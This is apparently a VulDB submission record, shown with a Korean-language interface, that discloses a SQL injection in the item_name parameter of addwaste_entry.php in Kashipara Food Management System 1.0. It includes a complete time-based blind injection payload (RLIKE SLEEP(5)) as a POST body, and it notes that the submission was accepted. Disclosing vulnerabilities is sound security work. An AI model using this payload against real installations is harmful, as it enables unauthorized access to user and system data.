| 제목 | kashipara Food Management System ≤1.0 SQL injection |
|---|
| 설명 | SQL injection vulnerability exists in item_name parameter of addwaste_entry.php file of Food Management System
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
Payload: chk_in_date=01/01/1967&entry_date=03-01-2024&item_name=pHqghUme&item_name[]=pHqghUme' RLIKE SLEEP(5) AND 'WvSf'='WvSf&item_type=3&itemnumber[]=0&itemype[]=5&quantity=1&submit=Save&waste=1 |
|---|
| 원천 | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%203.pdf |
|---|
| 사용자 | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
|---|
| 제출 | 2024. 01. 03. AM 11:09 (2 연령 ago) |
|---|
| 모더레이션 | 2024. 01. 06. AM 11:15 (3 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 249828 [Kashipara Food Management System 까지 1.0 addwaste_entry.php item_name SQL 주입] |
|---|
| 포인트들 | 20 |
|---|